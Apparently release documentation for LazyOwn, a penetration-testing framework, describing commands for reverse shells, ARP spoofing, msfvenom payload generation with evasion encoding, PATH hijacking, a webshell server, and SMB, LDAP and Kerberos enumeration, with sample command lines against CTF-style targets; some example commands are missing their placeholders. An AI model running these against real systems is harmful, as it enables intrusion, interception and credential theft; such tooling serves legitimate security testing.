1. Ensure that url, method, and proxy_port are set in self.params.
2. Provide additional parameters as needed.
3. Run the script modules/lazyown_burpfuzzer.py with the appropriate arguments.

Dependencies:

• modules/lazyown_burpfuzzer.py must be present in the modules directory and must be executable.

Example:
To run the fuzzer with URL http://example.com, HTTP method POST, and proxy port 8080, set:
self.params["url"] = "http://example.com"
self.params["method"] = "POST"
self.params["proxy_port"] = 8080
Then call:
run_lazyburpfuzzer()

Note:
- Ensure that all required parameters are set before calling this function.
- Parameters can also be provided via corresponding files.

lazyreverse_shell

Run the internal module located at modules/lazyreverse_shell.sh with the specified parameters.

The script will be executed with the following arguments:

• --ip: The IP address to use for the reverse shell.
• --puerto: The port to use for the reverse shell.

The function performs the following steps:

1. Retrieves the values for rhost (IP address) and reverse_shell_port (port) from self.params.
2. Validates that rhost and reverse_shell_port parameters are set.
3. Constructs the command to run the lazyreverse_shell.sh script with the specified arguments.
4. Executes the command.

:param ip: The IP address to use for the reverse shell. Must be set in self.params.
:type ip: str
:param port: The port to use for the reverse shell. Must be set in self.params.
:type port: str

:returns: None

Manual execution:

1. Ensure that rhost and reverse_shell_port are set in self.params.
2. Run the script modules/lazyreverse_shell.sh with the appropriate arguments.

Dependencies:

• modules/lazyreverse_shell.sh must be present in the modules directory and must be executable.

Example:
To set up a reverse shell with IP 192.168.1.100 and port 4444, set:
self.params["rhost"] = "192.168.1.100"
self.params["reverse_shell_port"] = "4444"
Then call:
run_lazyreverse_shell()

Note:
- Ensure that modules/lazyreverse_shell.sh has the necessary permissions to execute.
- Parameters must be set before calling this function.

lazyarpspoofing

Run the internal module located at modules/lazyarpspoofing.py with the specified parameters.

The script will be executed with the following arguments:

• --device: The network interface to use for ARP spoofing.
• lhost: The local host IP address to spoof.
• rhost: The remote host IP address to spoof.

The function performs the following steps:

1. Retrieves the values for lhost, rhost, and device from self.params.
2. Validates that lhost, rhost, and device parameters are set.
3. Constructs the command to run the lazyarpspoofing.py script with the specified arguments.
4. Executes the command.

:param lhost: The local host IP address to spoof. Must be set in self.params.
:type lhost: str
:param rhost: The remote host IP address to spoof. Must be set in self.params.
:type rhost: str
:param device: The network interface to use for ARP spoofing. Must be set in self.params.
:type device: str

:returns: None

Manual execution:

1. Ensure that lhost, rhost, and device are set in self.params.
2. Run the script modules/lazyarpspoofing.py with the appropriate arguments.

Dependencies:

• modules/lazyarpspoofing.py must be present in the modules directory and must be executable.

Example:
To execute ARP spoofing with local host 192.168.1.2, remote host 192.168.1.1, and device eth0, set:
self.params["lhost"] = "192.168.1.2"
self.params["rhost"] = "192.168.1.1"
self.params["device"] = "eth0"
Then call:
run_lazyarpspoofing()

Note:
- Ensure that modules/lazyarpspoofing.py has the necessary permissions to execute.
- Parameters must be set before calling this function.

lazyattack

Run the internal module located at modules/lazyatack.sh with the specified parameters.

The script will be executed with the following arguments:

• --modo: The mode of the attack.
• --ip: The target IP address.
• --atacante: The attacker IP address.

The function performs the following steps:

1. Retrieves the current working directory.
2. Validates that mode, rhost, and lhost parameters are set.
3. Constructs the command to run the lazyatack.sh script with the specified arguments.
4. Executes the command.

:param mode: The mode in which the attack should be run. Must be set in self.params.
:type mode: str
:param target_ip: The IP address of the target. Must be set in self.params.
:type target_ip: str
:param attacker_ip: The IP address of the attacker. Must be set in self.params.
:type attacker_ip: str

:returns: None

Manual execution:

1. Ensure that mode, rhost, and lhost are set in self.params.
2. Run the script modules/lazyatack.sh with the appropriate arguments.

Dependencies:

• modules/lazyatack.sh must be present in the modules directory and must be executable.

Example:
To execute the attack with mode scan, target IP 192.168.1.100, and attacker IP 192.168.1.1, set:
self.params["mode"] = "scan"
self.params["rhost"] = "192.168.1.100"
self.params["lhost"] = "192.168.1.1"
Then call:
run_lazyattack()

Note:
- Ensure that modules/lazyatack.sh has the necessary permissions to execute.
- Parameters must be set before calling this function.

lazymsfvenom

Runs the msfvenom tool to generate payloads based on user input.

Prompts the user to select a payload type from a list and executes the corresponding
msfvenom command to generate a payload. Moves the generated payloads to a sessions
directory and sets appropriate permissions. Optionally compresses the payloads using UPX
and handles a C payload with shikata_ga_nai.

:param line: Command line arguments for the script.
:return: None

lazyaslrcheck

Creates a path hijacking attack by performing the following steps:

1. Appends the value of binary_name to a temporary script located at modules/tmp.sh.
2. Copies this temporary script to /tmp with the name specified by binary_name.
3. Sets executable permissions on the copied script.
4. Prepends /tmp to the system's PATH environment variable to ensure the script is executed in preference to other binaries.

The function then prints out each command being executed and a message indicating the binary name used for the path hijacking.

:param binary_name: The name of the binary to be used in the path hijacking attack. It should be set in self.params before calling this method.
:type binary_name: str

:returns: None

Manual execution:

1. Ensure that binary_name is set in self.params.
2. Append the binary name to modules/tmp.sh.
3. Copy modules/tmp.sh to /tmp/{binary_name}.
4. Set executable permissions on the copied file.
5. Update the PATH environment variable to prioritize /tmp.

Dependencies:

• The self.params dictionary must contain a valid binary_name.
• Ensure that modules/tmp.sh exists and contains appropriate content for the attack.

Example:
To execute the path hijacking attack with binary_name as malicious, ensure self.params["binary_name"] is set to "malicious", and then call:
run_lazypathhijacking()

Note:
- The binary_name parameter must be a string representing the name of the binary to hijack.
- The method modifies the PATH environment variable, which may affect the execution of other binaries.

lazypathhijacking

Creates a path hijacking attack by performing the following steps:

1. Appends the value of binary_name to a temporary script located at modules/tmp.sh.
2. Copies this temporary script to /tmp with the name specified by binary_name.
3. Sets executable permissions on the copied script.
4. Prepends /tmp to the system's PATH environment variable to ensure the script is executed in preference to other binaries.

The function then prints out each command being executed and a message indicating the binary name used for the path hijacking.

:param binary_name: The name of the binary to be used in the path hijacking attack.
:returns: None

script

Run a script with the given arguments

This method constructs and executes a command to run a Python script with the specified arguments. It uses the run_command method to execute the script and handle real-time output.

:param script_name: The name of the script to be executed.
:type script_name: str
:param args: The arguments to be passed to the script.
:type args: tuple of str

:returns: None

Manual execution:

1. Build the command list with "python3", the script name, and the arguments.
2. Call run_command with the constructed command list.

Dependencies:

• run_command method for executing the constructed command and streaming output.

Example:
To execute a script named example.py with arguments arg1 and arg2, call:
run_script("example.py", "arg1", "arg2")

Note:
- The script_name parameter should be a string representing the name of the script.
- The args parameter is a variable-length argument list containing the arguments to be passed to the script.
- Ensure that the script and arguments are properly specified.

command

Run a command and print output in real-time

This method executes a given command using subprocess.Popen and streams both the standard output and standard error to the console in real-time. The output from both streams is appended to the self.output attribute. If interrupted, the process is terminated gracefully.

:param command: The command to be executed.
:type command: str

:returns: None

Manual execution:

1. Execute the command specified by the command parameter.
2. Stream and print the command's standard output and error to the console in real-time.
3. Append all output to the self.output attribute.
4. Handle KeyboardInterrupt by terminating the process and printing an error message.

Dependencies:

• subprocess module for running the command and capturing output.
• print_msg function for printing output to the console.
• print_error function for printing error messages to the console.

Example:
To execute a command, call run_command("ls -l").

Note:
- The command parameter should be a string representing the command to be executed.
- self.output must be initialized before calling this method.
- Ensure proper exception handling to manage process interruptions.

payload

Load parameters from payload.json

This function loads parameters from a JSON file named payload.json and updates the instance's params dictionary with the values from the file. If the file does not exist or contains invalid JSON, it will print an appropriate error message.

Usage:
payload

:param line: This parameter is not used in this function.
:type line: str

:returns: None

Manual execution:

1. Open and read the payload.json file.
2. Update the params dictionary with values from the JSON file.
3. Print a success message if the parameters were successfully loaded.
4. Handle FileNotFoundError if the file does not exist.
5. Handle JSONDecodeError if there is an error decoding the JSON file.

Dependencies:

• json module for reading and parsing the JSON file.

Example:
To execute the function, simply call payload.

Note:
- Ensure that payload.json exists in the current directory and is properly formatted.
- The confirmation message includes color formatting for better visibility.

exit

Exit the command line interface.

This function prompts the user to confirm whether they want to exit the command line interface. If confirmed, it will terminate the program. Otherwise, it will cancel the exit.

Usage:
exit

:param arg: This parameter is not used in this function.
:type arg: str

:returns: None

Manual execution:

1. Prompt the user with a confirmation message to exit the CLI.
2. If the user confirms with 's', print a message and exit the program.
3. If the user provides any other input, print a cancellation message and remain in the CLI.

Dependencies:

• sys.exit function for exiting the program.

Example:
To execute the function, simply call exit.

Note:
- The confirmation prompt is in Spanish.
- Ensure that sys is imported in your script.

fixperm

Fix permissions for LazyOwn shell scripts.

This function adjusts the file permissions for shell scripts and CGI scripts in the modules directory, making them executable.

Usage:
fixperm

:param line: This parameter is not used in this function.
:type line: str

:returns: None

Manual execution:

1. Change the permissions of all shell scripts in the modules directory to be executable.
2. Change the permissions of all files in the modules/cgi-bin directory to be executable.

Dependencies:

• chmod command must be available on the system.

Example:
To execute the function, simply call fixperm.

Note:
- Ensure you have the necessary permissions to modify file permissions.

lazywebshell

Run LazyOwn webshell server.

This function starts a web server that serves the lazywebshell.py script from the modules directory on port 8888. The server is run in the background.

Usage:
lazywebshell

:param line: This parameter is not used in this function.
:type line: str

:returns: None

Manual execution:

1. Start a Python HTTP server with CGI support on port 8888.
2. The server serves files from the modules directory.

Dependencies:

• Python 3.x must be installed on the system.
• The http.server module should be available.

Example:
To execute the function, simply call lazywebshell.

Note:
- The server runs in the background, and the output will not be displayed in the terminal.

getcap

Retrieve and display file capabilities on the system.

This function uses the getcap command to recursively list capabilities for files starting from the root directory (/). The output is filtered to suppress error messages.

Usage:
getcap

:param line: This parameter is not used in this function.
:type line: str

:returns: None

Manual execution:

1. Run the getcap -r / command to list file capabilities recursively from the root directory.
2. Redirect standard error to /dev/null to suppress error messages.

Dependencies:

• getcap must be installed on the system.

Example:
To execute the function, simply call do_getcap.

Note:
- The command may require elevated permissions to access certain directories and files.

getseclist

Get the SecLists wordlist from GitHub.

This function downloads and extracts the SecLists wordlist from GitHub to the /usr/share/wordlists/ directory.

Usage:
getseclist

:param line: This parameter is not used in this function.
:type line: str

:returns: None

Manual execution:

1. Navigate to the /usr/share/wordlists/ directory.
2. Download the SecLists repository using wget.
3. Extract the downloaded ZIP file.
4. Remove the ZIP file after extraction.

Dependencies:

• wget must be installed on the system.
• unzip must be installed on the system.
• sudo must be available for downloading and extracting files.

Example:
To execute the function, simply call getseclist.

Note:
- Ensure that you have the necessary permissions to write to the /usr/share/wordlists/ directory.
- If wget or unzip is not installed, the function will fail.

smbclient

Interacts with SMB shares using the smbclient command to perform the following operations:

1. Checks if rhost (remote host) and lhost (local host) are set; if not, an error message is displayed.
2. If line (share name) is provided:

• Attempts to access the specified SMB share on the remote host using the command: smbclient -N \\{rhost}\{line}

3. If line is not provided:

• Lists available SMB shares on the remote host with the command: smbclient -N -L \\{rhost}

4. Suggests a potential SMB exploit if possible by mounting the share from the local host using: mount -t cifs "//{lhost}/share" /mnt/smb

:param line: The name of the SMB share to access on the remote host. If not provided, the function will list all available shares.
:returns: None

smbmap

smbmap -H 10.10.10.3 [OPTIONS]
Uses the smbmap tool to interact with SMB shares on a remote host:

1. Checks if rhost (remote host) and lhost (local host) are set; if not, an error message is displayed.
2. If no line (share name or options) is provided:

• Attempts to access SMB shares on the remote host with a default user deefbeef using the command: smbmap -H {rhost} -u 'deefbeef'

3. If line is provided:

• Executes smbmap with the specified options or share name using the command: smbmap -H {rhost} -R {line}

4. Suggests a potential SMB exploit if possible by mounting the share from the local host using: mount -t cifs "//{lhost}/documents" /mnt/smb

:param line: Options or share name to use with smbmap. If not provided, uses a default user to list shares.
:returns: None

getnpusers

sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt
Executes the impacket-GetNPUsers command to enumerate users with Kerberos pre-authentication disabled.

1. Checks if the line (domain) argument is provided; if not, an error message is displayed, instructing the user to provide a domain.
2. Executes impacket-GetNPUsers with the following options:

• -no-pass: Skips password prompt.
• -usersfile sessions/users.txt: Specifies the file containing the list of users to check.

:param line: The domain to query. Must be provided in the format domain.com. Example usage: getnpusers domain.com
:returns: None

Manual execution:
To manually run this command, use the following syntax:
sudo impacket-GetNPUsers -no-pass -usersfile sessions/users.txt
Replace <domain> with the actual domain name you want to query.

psexec

Copies the rhost IP address to the clipboard and updates the prompt with the IP address.

1. Retrieves the rhost IP address from the self.params parameter.
2. Checks if the rhost is valid using check_rhost(). If invalid, the function returns without making changes.
3. If line is 'clean', resets the custom prompt to its original state.
4. Otherwise, updates the prompt to include the rhost IP address in the specified format.
5. Copies the rhost IP address to the clipboard using xclip.
6. Prints a message confirming that the IP address has been copied to the clipboard.

:param line: This parameter determines whether the prompt should be reset or updated with the IP address.
:type line: str
:returns: None

Manual execution:
To manually run this command, use the following syntax:
rhost
Replace <line> with 'clean' to reset the prompt, or any other string to update the prompt with the IP address.

rpcdump

Executes the rpcdump.py script to dump RPC services from a target host.

1. Retrieves the target host IP from the rhost parameter.
2. Checks if the rhost parameter is valid using check_rhost(). If invalid, the function returns early.
3. Executes the rpcdump.py script on port 135 and 593 to gather RPC service information from the target host.

:param line: This parameter is not used in this command but is included for consistency with other methods.
:returns: None

Manual execution:
To manually run this command, use the following syntax:
rpcdump.py -p 135 <target_host>
rpcdump.py -p 593 <target_host>
Replace <target_host> with the IP address or hostname of the target machine.

dig

Executes the dig command to query DNS information.

1. Retrieves the DNS server IP from the line parameter and the target host from the rhost parameter.
2. If either the DNS server or rhost is not provided, an error message is printed.
3. Executes the dig command to query the version of the DNS server and additional records.

:param line: DNS server IP or hostname. Must be provided for the dig command.
:param rhost: Target host for additional dig queries.

:returns: None

Manual execution:
To manually run these commands, use the following syntax:
dig version.bind CHAOS TXT @<dns_server>
dig any @

Replace <dns_server> with the IP address or hostname of the DNS server, <domain> with the target domain, and <rhost> with the IP address or hostname of the target machine.

cp

Copies a file from the ExploitDB directory to the sessions directory.

1. Retrieves the path to the ExploitDB directory and the target file from the line parameter.
2. Copies the specified file from the ExploitDB directory to the sessions directory in the current working directory.

:param line: The relative path to the file within the ExploitDB directory. For example, java/remote/51884.py.
:param exploitdb: The path to the ExploitDB directory. This must be set in advance or provided directly.

:returns: None

Manual execution:
To manually copy files, use the following syntax:
cp <exploitdb_path><file_path> <destination_path>

Replace <exploitdb_path> with the path to your ExploitDB directory, <file_path> with the relative path to the file, and <destination_path> with the path where you want to copy the file.

For example:
cp /usr/share/exploitdb/exploits/java/remote/51884.py /path/to/sessions/

dnsenum

Performs DNS enumeration using dnsenum to identify subdomains for a given domain.

1. Executes the dnsenum command with parameters to specify the DNS server, output file, and wordlist for enumeration.

:param line: The target domain to perform DNS enumeration on, e.g., ghost.htb.
:param rhost: The DNS server to use for enumeration, e.g., 10.10.11.24.
:param dnswordlist: The path to the DNS wordlist file used for subdomain discovery.

:returns: None

Manual execution:
To manually perform DNS enumeration, use the following command:
dnsenum --dnsserver <dns_server> --enum -p 0 -s 0 -o <output_file> -f <dns_wordlist> <target_domain>

Replace <dns_server> with the DNS server IP, <output_file> with the file path to save the results, <dns_wordlist> with the path to your DNS wordlist file, and <target_domain> with the domain to be enumerated.

For example:
dnsenum --dnsserver 10.10.11.24 --enum -p 0 -s 0 -o sessions/subdomains.txt -f /path/to/dnswordlist.txt ghost.htb

dnsmap

Performs DNS enumeration using dnsmap to discover subdomains for a specified domain.

1. Executes the dnsmap command to scan the given domain with a specified wordlist.

:param line: The target domain to perform DNS enumeration on, e.g., ghost.htb.
:param dnswordlist: The path to the wordlist file used for DNS enumeration.

:returns: None

Manual execution:
To manually perform DNS enumeration, use the following command:
dnsmap <target_domain> -w <dns_wordlist>

Replace <target_domain> with the domain you want to scan and <dns_wordlist> with the path to your DNS wordlist file.

For example:
dnsmap ghost.htb -w /path/to/dnswordlist.txt

whatweb

Performs a web technology fingerprinting scan using whatweb.

1. Executes the whatweb command to identify technologies used by the target web application.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed.
:param rhost: The target web host to be scanned, specified in the params dictionary.

:returns: None

Manual execution:
To manually perform web technology fingerprinting, use the following command:
whatweb <target_host>

Replace <target_host> with the URL or IP address of the web application you want to scan.

For example:
whatweb example.com

enum4linux

Performs enumeration of information from a target Linux/Unix system using enum4linux.

1. Executes the enum4linux command with the -a option to gather extensive information from the specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed.
:param rhost: The target host for enumeration, specified in the params dictionary.

:returns: None

Manual execution:
To manually enumerate information from a Linux/Unix system, use the following command:
enum4linux -a <target_host>

Replace <target_host> with the IP address or hostname of the target system.

For example:
enum4linux -a 192.168.1.10

nbtscan

Performs network scanning using nbtscan to discover NetBIOS names and addresses in a specified range.

1. Executes the nbtscan command with the -r option to scan the specified range of IP addresses for NetBIOS information.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed.
:param rhost: The target network range for scanning, specified in the params dictionary.

:returns: None

Manual execution:
To manually perform a NetBIOS scan across a network range, use the following command:
sudo nbtscan -r <network_range>

Replace <network_range> with the IP address range you want to scan. For example:
sudo nbtscan -r 192.168.1.0/24

rpcclient

Executes the rpcclient command to interact with a remote Windows system over RPC (Remote Procedure Call) using anonymous credentials.

1. Runs rpcclient with the -U '' (empty username) and -N (no password) options to connect to the target host specified by rhost.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed.
:param rhost: The IP address of the remote host to connect to, specified in the params dictionary.

:returns: None

Manual execution:
To manually interact with a remote Windows system using RPC, use the following command:
rpcclient -U '' -N <target_ip>

Replace <target_ip> with the IP address of the target system. For example:
rpcclient -U '' -N 10.10.10.10

nikto

Runs the nikto tool to perform a web server vulnerability scan against the specified target host.

1. Executes nikto with the -h option to specify the target host IP address.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed.
:param rhost: The IP address of the target web server, specified in the params dictionary.

:returns: None

Manual execution:
To manually perform a web server vulnerability scan using nikto, use the following command:
nikto -h <target_ip>

Replace <target_ip> with the IP address of the target web server. For example:
nikto -h 10.10.10.10

openssl_sclient

Uses openssl s_client to connect to a specified host and port, allowing for testing and debugging of SSL/TLS connections.

:param line: The port number to connect to on the target host. This must be provided as an argument.
:param rhost: The IP address or hostname of the target server, specified in the params dictionary.

:returns: None

Manual execution:
To manually connect to a server using openssl s_client and test SSL/TLS, use the following command:
openssl s_client -connect <target_ip>:

Replace <target_ip> with the IP address or hostname of the target server and <port> with the port number. For example:
openssl s_client -connect 10.10.10.10:443

ss

Uses searchsploit to search for exploits in the Exploit Database based on the provided search term.

:param line: The search term or query to find relevant exploits. This must be provided as an argument.

:returns: None

Manual execution:
To manually search for exploits using searchsploit, use the following command:
searchsploit <search_term>

Replace <search_term> with the term or keyword you want to search for. For example:
searchsploit kernel

wfuzz

Uses wfuzz to perform fuzzing based on provided parameters. This function supports various options for directory and file fuzzing.

:param line: The options and arguments for wfuzz. The line parameter can include the following:
- sub <domain>: Fuzz DNS subdomains. Requires dnswordlist to be set.
- iis: Fuzz IIS directories. Uses a default wordlist if iiswordlist is not set.
- Any other argument: General directory and file fuzzing.

:returns: None

Manual execution:
To manually use wfuzz for directory and file fuzzing, use the following commands:

1. For fuzzing DNS subdomains:
   wfuzz -c <extra_options> -t -w -H 'Host: FUZZ.'

Example:
wfuzz -c --hl=7 -t 200 -w /path/to/dnswordlist -H 'Host: FUZZ.example.com' example.com

2. For fuzzing IIS directories:
   wfuzz -c <extra_options> -t -w /path/to/iiswordlist http:///FUZZ

Example:
wfuzz -c --hl=7 -t 200 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/IIS.fuzz.txt http://10.10.10.10/FUZZ

3. For general directory and file fuzzing:
   wfuzz -c <extra_options> -t -w http:///FUZZ

Example:
wfuzz -c --hl=7 -t 200 -w /path/to/dirwordlist http://10.10.10.10/FUZZ

launchpad

Searches for packages on Launchpad based on the provided search term and extracts codenames from the results. The distribution is extracted from the search term.

:param line: The search term to be used for querying Launchpad. The line parameter should be a string containing
the search term, e.g., "8.2p1 Ubuntu 4ubuntu0.11".

:returns: None

Manual execution:
To manually execute the equivalent command, use the following steps:

1. Extract the distribution from the search term:

• This function assumes the distribution name is part of the search term and is used to build the URL.

2. URL encode the search term:

• Replace spaces with %20 to form the encoded search query.

3. Use curl to perform the search and filter results:
   curl -s "https://launchpad.net/+search?field.text=<encoded_search_term>" | grep 'href' | grep '' | grep -oP '(?<=href="https://launchpad.net//)[^/"]+' | sort -u

Example:
If the search term is "8.2p1 Ubuntu 4ubuntu0.11", the command would be:
curl -s "https://launchpad.net/+search?field.text=8.2p1%20Ubuntu%204ubuntu0.11" | grep 'href' | grep 'ubuntu' | grep -oP '(?<=href="https://launchpad.net/ubuntu/)[^/"]+' | sort -u

Notes:
- Ensure that curl is installed and accessible in your environment.
- The extracted codenames are printed to the console.

gobuster

Uses gobuster for directory and virtual host fuzzing based on provided parameters. Supports directory enumeration and virtual host discovery.

:param line: The options and arguments for gobuster. The line parameter can include the following:
- url: Perform directory fuzzing on a specified URL. Requires url and dirwordlist to be set.
- vhost: Perform virtual host discovery on a specified URL. Requires url and dirwordlist to be set.
- Any other argument: General directory fuzzing with additional parameters.

:returns: None

Manual execution:
To manually use gobuster, use the following commands:

1. For directory fuzzing:
   gobuster dir --url / --wordlist

Example:
gobuster dir --url http://example.com/ --wordlist /path/to/dirwordlist

2. For virtual host discovery:
   gobuster vhost --append-domain -u -w --random-agent -t 600

Example:
gobuster vhost --append-domain -u http://example.com -w /path/to/dirwordlist --random-agent -t 600

3. For general directory fuzzing with additional parameters:
   gobuster dir --url http:/// --wordlist <additional_parameters>

Example:
gobuster dir --url http://10.10.10.10/ --wordlist /path/to/dirwordlist -x .php,.html

addhosts

Adds an entry to the /etc/hosts file, mapping an IP address to a domain name.

:param line: The domain name to be added to the /etc/hosts file.
- Example: permx.htb

:returns: None

Manual execution:
To manually add a domain to the /etc/hosts file, use the following command:

sudo sh -c -e "echo '<rhost> <domain>' >> /etc/hosts"

Example:
sudo sh -c -e "echo '10.10.11.23 permx.htb' >> /etc/hosts"

This command appends the IP address and domain name to the /etc/hosts file, enabling local resolution of the domain.

cme

Performs an SMB enumeration using crackmapexec.

:param line: Not used in this function.

:returns: None

Manual execution:
To manually run crackmapexec for SMB enumeration, use the following command:

crackmapexec smb <target>

Example:
crackmapexec smb 10.10.11.24

This command will enumerate SMB shares and perform basic SMB checks against the specified target IP address.

ldapdomaindump

Dumps LDAP information using ldapdomaindump with credentials from a file.

:param line: The domain to use for authentication (e.g., 'domain.local').

:returns: None

Manual execution:
To manually run ldapdomaindump for LDAP enumeration, use the following command:

ldapdomaindump -u '<domain>\<username>' -p '<password>' <target>

Example:
ldapdomaindump -u 'domain.local\Administrator' -p 'passadmin123' 10.10.11.23

Ensure you have a file sessions/credentials.txt in the format user:password, where each line contains credentials for the LDAP enumeration.

bloodhound

Perform LDAP enumeration using bloodhound-python with credentials from a file.

:param line: This parameter is not used in the function but could be used for additional options or domain information.

:returns: None

Manual execution:
To manually run bloodhound-python for LDAP enumeration, use the following command:

bloodhound-python -c All -u '<username>' -p '<password>' -ns <target>

Example:
bloodhound-python -c All -u 'usuario' -p 'password' -ns 10.10.10.10

Ensure you have a file sessions/credentials.txt with the format user:password, where each line contains credentials for enumeration.

ping

Perform a ping to check host availability and infer the operating system based on TTL values.

:param line: This parameter is not used in the function but could be used for additional options or settings.

:returns: None

Manual execution:
To manually ping a host and determine its operating system, use the following command:

ping -c 1 <target>

Example:
ping -c 1 10.10.10.10

The TTL (Time To Live) value is used to infer the operating system:

• TTL values around 64 typically indicate a Linux system.
• TTL values around 128 typically indicate a Windows system.

Ensure you have set rhost to the target host for the command to work.

gospider

Try gospider for web spidering.

This function executes the gospider tool to perform web spidering. It can either use a URL provided as a parameter or the remote host defined in self.params.

Usage:
gospider url
gospider

:param line: Command parameter that determines the execution mode. Use "url" to specify a URL, or leave empty to use the remote host.
:type line: str

• If line is "url", the method uses the URL specified in self.params["url"].
• If line is not "url", the method uses the remote host specified in self.params["rhost"].

:returns: None

Manual execution:

1. Ensure that the gospider tool is installed on the system.
2. Set the url parameter if using the "url" mode.
3. Run the method to perform the spidering operation.

Dependencies:

• gospider must be installed on the system.
• The sudo command must be available for installing gospider.

Examples:
1. To scan a specific URL: gospider url
2. To scan the remote host: gospider

Note:
- If gospider is not installed, the method will attempt to install it.
- Ensure that the network and tools are configured correctly for successful execution.

arpscan

Executes an ARP scan using arp-scan.

This function performs an ARP scan on the local network using the arp-scan tool. The network device to be used for scanning must be specified.

Usage:
arpscan

:param line: Command parameters (not used in this function).
:type line: str

• Executes the arp-scan command with the specified network device.

:returns: None

Manual execution:

1. Ensure that the network device is set using the appropriate parameter.
2. Run the method to perform an ARP scan.

Dependencies:

• arp-scan must be installed on the system.
• The sudo command must be available for executing arp-scan.

Examples:
1. Set the device parameter using set device <network_device>.
2. Run arpscan to perform the ARP scan.

Note:
- The network device must be configured

---

This discussion was created from the release LazyOwn v0.1.1 Release.